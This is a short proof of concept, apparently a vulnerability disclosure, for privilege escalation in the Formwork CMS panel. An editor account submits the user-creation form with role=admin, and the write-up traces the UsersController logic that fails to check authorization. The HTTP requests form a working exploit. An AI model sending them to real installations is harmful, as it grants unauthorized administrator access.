Proof of Concept: Privilege Escalation via User Creation
=========================================================

Prerequisites:
- Valid editor account credentials
- Access to the Formwork panel

Step 1: Login as Editor
POST /panel/login
username=editor&password=editor123

Step 2: Access User Creation Form
GET /panel/users/new/

Step 3: Create User with Escalated Privileges
POST /panel/users/new/
form-data:
  - fullname: Attacker Admin
  - username: attacker
  - password: P@ssw0rd123
  - email: attacker@evil.com
  - language: en
  - role: admin  <-- PRIVILEGE ESCALATION HERE

Vulnerable Backend Processing:
1. Editor submits form with role=admin
2. UsersController::create() receives the request
3. $roleId = $form->data()->get('role', 'user')  // Gets 'admin'
4. if (!$this->site->users()->roles()->has($roleId))  // Only checks if 'admin' exists
5. $user->setMultiple($form->data()->toArray())  // Assigns admin role
6. $user->save()  // New admin user created!

Result: Editor successfully created an admin user without having admin privileges.

The vulnerability exists because the code trusts the role parameter from the 
form submission without verifying the current user's authorization to assign 
that specific role.